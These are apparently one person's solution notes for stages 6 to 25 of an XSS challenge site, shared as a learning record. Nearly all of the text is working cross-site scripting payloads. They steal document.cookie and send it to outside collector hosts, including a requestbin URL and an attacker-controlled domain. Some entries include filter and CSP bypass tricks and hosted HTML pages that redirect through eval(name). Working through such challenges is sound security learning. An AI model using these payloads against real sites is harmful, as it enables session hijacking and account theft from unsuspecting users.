{} = URL to view requests
Stage 6 /?q=</xmp><img+src=1+onerror=location.href='{}?'+document.cookie>
Stage 7 /?q=%27%20onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27 #なんでautofocusに値を入れないと実行されないでしょう?
Stage 8 /?q=%27onfocus=location.href=%27{}?%27%2Bdocument.cookie;%20autofocus=%27%27
Stage 9
/?q=XSS%20onfocus=location={}?
%2bdocument.cookie%20autofocus
Stage 10
/?q=javascript:onerror=location={}?
%2bdocument.cookie
Stage 11
/?q=javascript:onerror=location={}?
%2bdocument.cookie
Stage 12
?q=javascript:onerror=top.location={}?
%2bdocument.cookie
Stage 13 ?q= //document.cookie, window.sessionStorage, window.localStorage is being censored //their base64 versions atob('ZG9jdW1lbnQuY29va2ll') etc is also being censored
Stage 14 #Set document.domain self to bypass CSP + append payload (parent.document.cookie is important because you want the first URL's cookie) ?q=//8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?document.domain=%27knock.xss.moe%27;top.location.href=%27http://requestbin.net/r/17yvn3e1?%27+encodeURIComponent(parent.document.cookie)
Stage 15 #Add script tag, no CSP ?q=%3Cscript%3Etop.location.href=%27http://requestbin.net/r/17yvn3e1?%27%2Bparent.document.cookie%3C/script%3E
Stage 16 ?q=javascript:top.location.href=%27http://requestbin.net/r/17yvn3e1?%27%2Bparent.document.cookie
Stage 17 ?q=javascript:top.location.href='http://requestbin.net/r/17yvn3e1?'%2Bparent.document.cookie
Stage 18
#Escaping quotes enclosing URL didnt work
?q=');top.location.href=http://requestbin.net/r/17yvn3e1?
%2Bdocument.cookie//
Stage 19
#alert('Hello',1,alert(0)) <- put payload to execute second alert before first alert
?q=%27,1,window.open(http://requestbin.net/r/17yvn3e1?
%2Bdocument.cookie));//
Stage 20
#<script> tag is being filtered. Use svg onload etc instead.
?q=<svg onload=javascript:location.href=http://requestbin.net/r/17yvn3e1?
%2Bdocument.cookie>
Stage 21 Same as Stage 20
Stage 22
#Use a short domain name
?q=%3Csvg%20onload=javascript:location=//ylkoh.top?
%2Bdocument.cookie%3E
Stage 23
#Shorter!
?q=%3Csvg onload=location=//ylkoh.top?
%2Bdocument.cookie%3E
Stage 24
#Shorter!! (put payload on hosted page)
?q=<svg onload=location=//ylkoh.top/x.html
>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body >
<img src='#' onerror=window.open('http://ylkoh.top?'%2Bdocument.cookie) />;
</body>
</html>
<script>
name = "location.href='http://ylkoh.top?'+document.cookie";
location.href = "http://1498f071159fd60222c0e7e82b7b6ff046e9e52e.knock.xss.moe/?q=%3Csvg/onload=eval(name)%3E";
</script>
Stage 25 #Host this payload externally and Enter link directly into submission box http://ylkoh.top/x
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body >
<img src='#' onerror=window.open('http://ylkoh.top?'%2Bdocument.cookie) />;
</body>
</html>
<script>
name = "location.href='http://ylkoh.top?'+document.cookie";
location.href = "http://8e67e39d7e01213d5551c696ef8641b625cc8dd7.knock.xss.moe/?q=%3Csvg/onload=eval(name)%3E";
</script>
Just made it public as it helped me to learn about XSS a lot